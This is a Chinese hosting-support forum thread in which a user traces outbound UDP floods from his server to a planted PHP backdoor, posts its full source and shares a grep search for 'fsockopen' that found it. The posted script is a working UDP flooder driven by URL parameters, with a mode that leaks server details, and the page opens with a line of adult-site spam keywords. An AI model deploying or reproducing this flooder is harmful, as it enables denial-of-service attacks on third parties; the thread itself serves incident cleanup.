永久黄网站色视频免费直播,yy6080三理论日本中文,亚洲无码免费在线观看视频,欧美日韩精品一区二区在线播放

Board logo

標(biāo)題: [求助] 切換到nginx+apache馬上對(duì)外發(fā)包卡死 切換到apache暫時(shí)沒有問題 [打印本頁]

作者: qq369984    時(shí)間: 2013-12-27 08:34     標(biāo)題: 切換到nginx+apache馬上對(duì)外發(fā)包卡死 切換到apache暫時(shí)沒有問題

有遇到相關(guān)問題的朋友嘛,請(qǐng)告知,是網(wǎng)站被掛馬了,還是服務(wù)器被搞成肉雞了?
作者: admin    時(shí)間: 2013-12-27 09:43

應(yīng)該是被掛UDP的馬了

被掛馬了,切apache一樣會(huì)有問題的,也許只是時(shí)間巧合
作者: qq369984    時(shí)間: 2013-12-27 20:11

回復(fù) 2# admin


   老大的 有什么好的解決辦法嘛?
作者: qq369984    時(shí)間: 2013-12-27 20:14

1111.jpg
老大能告知一個(gè)哪個(gè)比較可疑嗎?

圖片附件: 1111.jpg (2013-12-27 20:14, 163.36 KB) / 下載次數(shù) 9683
http://www.fsowen.com/bbs/attachment.php?aid=4048&k=756609117bc6b979c22480b06b89be0b&t=1743875014&sid=L97FzB


作者: admin    時(shí)間: 2013-12-28 11:10

看這里,看不出來的

你查下你的服務(wù)器上有沒馬文件就是了
作者: qq369984    時(shí)間: 2013-12-29 00:09

回復(fù) 5# admin


   景安技術(shù)讓我下載回來查殺,快有40G文件,也不方便啊。   LINUX 文件下的文件不是太熟悉,有些暈啊。
作者: qq369984    時(shí)間: 2013-12-29 00:25

[tr][/tr]
現(xiàn)在防火墻里面關(guān)閉了UDP對(duì)外發(fā)包 只開放了 DNS 不知道能不能行





作者: qq369984    時(shí)間: 2013-12-29 01:33

<?php
set_time_limit(999999);
$host = $_GET['ip'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
        if (StrLen($_GET['rat'])<>0){
                echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
                exit;
            }
        echo "Warning to: opening";
        exit;
    }

for($i=0;$i<$Sendlen;$i++){
        $out .= "A";
    }

$max_time = time()+$exec_time;
while(1){
    $packets++;
    if(time() > $max_time){
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
        if($fp){
            fwrite($fp, $out);
            fclose($fp);
    }
}

echo "Send Host:$hostport<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>


哈哈 老大 木馬讓我找到了  給大家分享一下辦法 查找字符串grep -r "fsockopen" ./ 然后一個(gè)個(gè)分析
作者: admin    時(shí)間: 2013-12-29 09:48

很好,正是此馬

其實(shí)不用下載所有的文件,只要查找PHP類型的文件即可
作者: qq369984    時(shí)間: 2013-12-29 10:52

回復(fù) 9# admin


謝謝老大
作者: alin    時(shí)間: 2014-5-3 17:29

只要查找PHP類型的文件即可,是什么意思?今天我服務(wù)器也不穩(wěn)定,機(jī)房說是服務(wù)器發(fā)包,怎么解決呢,我暈




歡迎光臨 WDlinux官方論壇 (http://www.fsowen.com/bbs/) Powered by Discuz! 7.2